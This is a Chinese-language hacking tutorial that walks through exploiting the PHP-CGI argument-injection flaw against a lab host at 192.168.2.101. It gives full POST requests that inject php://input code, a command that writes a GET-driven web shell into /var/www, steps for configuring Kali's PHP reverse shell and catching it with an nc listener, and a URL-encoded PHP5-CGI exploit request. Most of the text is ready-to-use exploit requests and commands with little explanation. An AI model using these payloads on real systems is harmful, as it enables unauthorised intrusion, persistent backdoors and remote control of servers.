写入WebShell
利用php配置漏洞，执行php代码进而执行系统命令
（可利用Burpsuite发送POST）

POST http://192.168.2.101/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host: 192.168.2.101
Content-Length: 34

<?php
passthru('id');
die();
?>


将执行命令替换为

passthru('ls /var/www');
1
查看www网站下的资源

写入WebShell

passthru('echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/1.php');
1
反斜杠为转义字符

查看是否上传成功

passthru('ls /var/www');
1

写入成功
检查上传文件的内容

passthru('cat /var/www/1.php');
1

发现内容无误
访问该页面并执行系统命令

192.168.2.101/1.php?cmd=id
1

Shell执行成功

写入反弹Shell
kali自带PHP反弹Shell：

/usr/share/webshells/php/php-reverse-shell.php
1
拷贝到桌面

cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop/2.php
1
编辑配置

vi 2.php
1
将反弹IP给为本机IP

也可以改反弹端口，保存退出
使用nc侦听1234端口：

nc -nvvlp 1234
1

上传反弹shell

捕获shell


Ubuntu/Debian默认安装PHP5-cgi漏洞
可直接访问/cgi-bin/php5和/cgi-bin/php
提交漏洞代码

POST 
/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 192.168.2.101
 
<?php
echo system('id');
die();
?>